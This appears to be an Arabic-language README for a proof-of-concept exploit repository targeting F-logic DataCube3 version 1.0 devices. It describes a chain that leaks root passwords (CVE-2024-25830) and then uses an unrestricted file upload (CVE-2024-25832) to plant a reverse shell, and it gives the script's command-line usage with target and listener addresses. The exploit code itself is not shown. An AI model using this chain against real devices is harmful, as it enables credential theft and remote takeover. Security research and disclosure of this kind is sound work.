
PoC Script لـ CVE-2024-25832: سلسلة استغلال صدفة عكسية، كشف معلومات (تسريب كلمة مرور الجذر) + رفع ملف غير مقيد في DataCube3
يحتوي هذا المستودع على إثبات المفهوم (PoC) لسلسلة استغلال من خطوتين تستهدف أجهزة DataCube3. تجمع بين CVE-2024-25830 (التحكم غير الصحيح في الوصول) لاستخراج كلمات مرور الجذر و CVE-2024-25832 (رفع الملفات غير المقيد) لنشر سكربت شل عكسي. يكمل هذا الإثبات تحليل الثغرات المفصل في منشور المدونة "تقرير ثغرات DataCube3."
جميع أجهزة F-logic DataCube3 الإصدار 1.0.
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

لأغراض تعليمية فقط.